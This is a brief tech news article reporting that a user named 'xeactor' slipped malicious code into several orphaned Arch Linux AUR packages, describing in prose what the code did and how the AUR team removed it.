Malicious Code Found in Arch Linux AUR Repository

  • 202
  •  
  •  
  •  
  • 1
  •  
  •  
  •  
    203
    Shares

Arch Linux’s AUR package repository has been found to contain malware. It was discovered within one of the user submitted packages. The malicious code was immediately removed when the AUR team intervened. The incident occurred because the AUR team allow users to contribute to abandoned repositories.

The malicious code was found on Saturday when a user discovered a pseudonym “xeactor” that overrode a package named “acroread” which allows Arch to view PDF files in a system.

The Git commit log shows that the new packaged malicious code will download a file named “~x” from ptpb.pw a lightweight package that allows users to share tiny pieces of text files, it will then execute another file named “~u”. The main purpose of the file is to modify the systemd and also add a timer to run the ~u file every 360 seconds.

The “~u” command collects date, time, machine ID, CPU information, Pacman (Package Manager) information and the entire output of the command “uname -a” and “systemctl list-units”.

The AUR team have also said they have found similar code in other packages:

  • acroread 9.5.5-8
  • balz 1.20-3
  • minergate 8.1-2

The malicious code changes were reversed and xeactor’s accounts were suspended. The AUR packages are user-submitted packages to the Arch Linux Repo. There are a lot of cases this year where most of the code of the operating system has been affected by some sort of malware.

The following two tabs change content below.
I am a programmer and tech enthusiast who loves to use my creative skills to solve complex solutions. I also love to stay abreast of what is happening in the world of technology, reach me at: [email protected]

Harikrishna Mekala

I am a programmer and tech enthusiast who loves to use my creative skills to solve complex solutions. I also love to stay abreast of what is happening in the world of technology, reach me at: [email protected]

Leave a Reply